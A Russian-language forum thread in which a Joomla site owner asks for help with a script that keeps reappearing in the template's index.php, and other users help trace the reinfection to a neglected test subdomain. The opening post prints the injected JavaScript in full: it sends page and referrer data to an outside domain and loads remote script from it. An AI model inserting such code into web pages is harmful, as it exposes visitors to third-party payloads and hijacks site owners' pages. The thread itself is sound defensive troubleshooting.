0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 2062 Просмотров
*

webwin12

  • Новичок
  • 5
  • 0 / 0
Вот такой кусок ***-кода прописывается в index.php шаблона каждый раз после его удаления.   

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://RUBYROCKINGCHAIR.COM/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>

Joomla 2.5.28
Сторонние компоненты: K2 Version 2.6.8, Phoca Maps. Модули: ARI Image Slider, Sj Contact AJAX.
Дата последнего входа в панель управления: 2015-11-19 20:54:05 - реально не был в это время.
Что делал пять дней назад:
Проверял на base64 файлы и сканил антивиром, айболитом, ничего не обнаружил.
Удалил *** код, поменял все пароли какие можно, запретил доступ в админку через htaccess (только по айпи).
Тишина дней пять, теперь опять.
Что делать? Где копать?    !

*

voland

  • Легенда
  • 11031
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

webwin12

  • Новичок
  • 5
  • 0 / 0
Нет не варез.
*

voland

  • Легенда
  • 11031
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

webwin12

  • Новичок
  • 5
  • 0 / 0
Вы про Sj Contact AJAX, затрудняюсь ответить т.к. сайт достался по наследству. Так в чём может быть причина?
*

voland

  • Легенда
  • 11031
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
В том что сами установили бэкдор или тот кто сайт делал.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Смотреть в логах хостинга запросы POST и проверять каждый файл, к которому запрос
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Выставьте Айболит на параноидальный уровень проверки и проверьте. Что-то по любому есть. Хотя может заражаться с других сайтов аккаунта если такие есть. Securitycheck можно поставить и проверить в его списке уязвимости расширений.
*

webwin12

  • Новичок
  • 5
  • 0 / 0
Выставьте Айболит на параноидальный уровень проверки и проверьте. Что-то по любому есть. Хотя может заражаться с других сайтов аккаунта если такие есть. Securitycheck можно поставить и проверить в его списке уязвимости расширений.
Спасибо за наводку, так оно и было т.е. был тестовый поддомен типа test.site.ru, его не юзали вообще года два наверное, там была Joomla старой версии вообще 1.5.... Короче что там было долго объяснять, кошмар одним словом, куча левых файлов типа  defines.php.suspected прям в корне. Еще раз спасибо!
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
На будущее советую все сайты держать отдельно по пользователям или хотя бы open_basedir.
*

webwin12

  • Новичок
  • 5
  • 0 / 0
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 63070
Последний ответ 30.08.2023, 12:53:33
от SeBun
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 2930
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
На сайте появился вирус

Автор Lifar

Ответов: 3
Просмотров: 665
Последний ответ 23.04.2021, 10:12:05
от ProtectYourSite
Регистрируются боты на сайте непрерывно.

Автор Stich SPb

Ответов: 27
Просмотров: 13267
Последний ответ 22.02.2021, 17:42:48
от soty20
Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

Ответов: 792
Просмотров: 274966
Последний ответ 23.02.2020, 21:18:16
от draff